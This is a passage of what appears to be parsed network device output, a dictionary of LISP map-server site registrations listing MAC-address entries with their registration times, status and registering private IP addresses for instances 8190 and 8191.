"inst_id": 8190,
},
"cc3d.82ff.41e0/48": {
"last_register": "00:26:58",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"ccc0.79ff.44d9/48": {
"last_register": "1d08h",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8190,
},
"d0a6.37ff.2224/48": {
"last_register": "00:39:04",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8190,
},
"d4ae.52ff.ae5e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
"d4ae.52ff.3a85/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8190,
},
"d4d2.52ff.5294/48": {
"last_register": "03:14:13",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"d63d.a7ff.34aa/48": {
"last_register": "00:03:02",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"d81d.72ff.85e4/48": {
"last_register": "00:28:51",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"d8bb.2cff.b9db/48": {
"last_register": "00:01:21",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"dc08.0fff.47e4/48": {
"last_register": "00:02:47",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"dc37.14ff.1b32/48": {
"last_register": "00:00:14",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"dca9.04ff.66a2/48": {
"last_register": "01:11:33",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8190,
},
"dca9.04ff.7024/48": {
"last_register": "02:12:48",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"e04f.43ff.5854/48": {
"last_register": "4d04h",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"e04f.43ff.6efa/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8190,
},
"e201.8cff.57e0/48": {
"last_register": "00:31:03",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8190,
},
"e2e4.50ff.290b/48": {
"last_register": "00:10:11",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8190,
},
"e470.b8ff.bd26/48": {
"last_register": "01:29:27",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"e470.b8ff.97a8/48": {
"last_register": "01:02:32",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8190,
},
"e4b3.18ff.e93e/48": {
"last_register": "01:02:05",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"e86a.64ff.56fd/48": {
"last_register": "03:37:53",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8190,
},
"f018.98ff.d24c/48": {
"last_register": "01:29:41",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"f018.98ff.d664/48": {
"last_register": "02:06:54",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8190,
},
"f018.98ff.ea10/48": {
"last_register": "00:15:16",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"f018.98ff.6304/48": {
"last_register": "05:01:49",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8190,
},
"f018.98ff.ce4e/48": {
"last_register": "01:56:21",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8190,
},
"f018.98ff.a199/48": {
"last_register": "00:01:10",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8190,
},
"f2dc.88ff.3f09/48": {
"last_register": "00:02:17",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"f40e.01ff.df89/48": {
"last_register": "01:00:46",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8190,
},
"f493.9fff.aec0/48": {
"last_register": "1d16h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8190,
},
"f493.9fff.4765/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8190,
},
"f496.34ff.00d6/48": {
"last_register": "02:39:57",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"f859.71ff.bdb0/48": {
"last_register": "19:55:17",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8190,
},
"f8ff.c2ff.5f98/48": {
"last_register": "00:00:05",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8190,
},
"f8ff.c2ff.2830/48": {
"last_register": "02:34:03",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8190,
},
"f8ff.c2ff.123e/48": {
"last_register": "02:44:17",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8190,
},
"f8ff.c2ff.b2d6/48": {
"last_register": "00:19:56",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8190,
},
"fc4d.d4ff.9ba5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8190,
},
"fc4d.d4ff.25ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8190,
},
}
},
},
8191: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8191,
},
"0000.0cff.94fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0002.b9ff.e707/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"0002.fdff.f596/48": {
"last_register": "05:41:20",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"0004.f2ff.c644/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0007.7dff.0fb1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"0007.7dff.11f6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"0008.32ff.b366/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"000b.abff.6eab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0015.f9ff.2a95/48": {
"last_register": "3d17h",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"0019.55ff.d54a/48": {
"last_register": "1w6d",
"up": "yes#",
"who_last_registered": "10.8.128.161:29272",
"inst_id": 8191,
},
"0023.33ff.3c9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0023.33ff.40a1/48": {
"last_register": "00:04:08",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0023.33ff.45d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0024.c4ff.ad75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"0025.84ff.782f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0027.90ff.05db/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"0027.90ff.084b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0027.90ff.099e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0027.90ff.0c23/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"0027.90ff.3e99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"0027.90ff.48b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"0027.90ff.5c3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0027.90ff.61b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"0029.c2ff.862d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0038.dfff.64ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0045.1dff.7615/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0045.1dff.a630/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"0050.60ff.dc12/48": {
"last_register": "00:07:14",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.f272/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.0abe/48": {
"last_register": "1w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.a1e9/48": {
"last_register": "00:08:23",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.42ac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0050.60ff.925f/48": {
"last_register": "00:07:15",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0050.60ff.9d91/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0050.60ff.a34d/48": {
"last_register": "19:20:02",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.a613/48": {
"last_register": "19:20:03",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.f6a0/48": {
"last_register": "19:20:02",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0050.60ff.3148/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0050.60ff.4288/48": {
"last_register": "19:20:02",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.ce2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.ce65/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.cfce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.cf65/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0057.d2ff.cf86/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0057.d2ff.cfa1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"0057.d2ff.530f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.55f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"0057.d2ff.56fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.57bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.5bdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.5dda/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.5e3f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.5e66/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.5f08/48": {
"last_register": "12:48:17",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.5f20/48": {
"last_register": "1d13h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.5f74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.61c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.6157/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.6190/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.6256/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.633d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.6415/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.6433/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.66c4/48": {
"last_register": "09:27:42",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.66d3/48": {
"last_register": "06:18:05",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.6916/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.694c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.6f5b/48": {
"last_register": "00:38:37",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.72dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.7228/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.72be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.73ed/48": {
"last_register": "11:17:48",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.7312/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.768a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.92dd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.95e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.95ec/48": {
"last_register": "2d15h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.96c4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.96dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.9682/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.975a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.979c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.98e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.98fe/48": {
"last_register": "04:24:07",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.9808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.99c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9973/48": {
"last_register": "22:13:48",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.998e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.99b2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9ae7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9af6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9afc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9a24/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"0057.d2ff.9a3f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9a51/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9a66/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9a81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9aba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9b41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.9b7a/48": {
"last_register": "07:00:12",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.9cdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.9d4b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.9e50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9f31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.9f9d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.a0c3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.a252/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.a25b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.a6d2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.a966/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.20e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.21f8/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2102/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.211a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.213e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2144/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.214a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2159/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.215f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2162/48": {
"last_register": "02:10:46",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"0057.d2ff.21a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.21b9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.22d6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.236f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2384/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.23b7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2d53/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2e58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2e7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2e88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"0057.d2ff.2e9a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.2ebe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.3005/48": {
"last_register": "03:46:32",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"0057.d2ff.341c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.161:29272",
"inst_id": 8191,
},
"0057.d2ff.3437/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"0057.d2ff.a04d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"0057.d2ff.aa71/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.aaa1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.af06/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"0057.d2ff.af45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b092/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"0057.d2ff.b0a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"0057.d2ff.b0b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"0057.d2ff.b1d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b1e2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b1e5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b1e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"0057.d2ff.b11f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b143/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b15e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b16d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b173/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b17c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b191/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b194/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b19d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b1be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"0057.d2ff.b2ed/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"0057.d2ff.b206/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"0057.d2ff.b233/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"0057.d2ff.b23c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"0057.d2ff.b24e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"0057.d2ff.b27e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
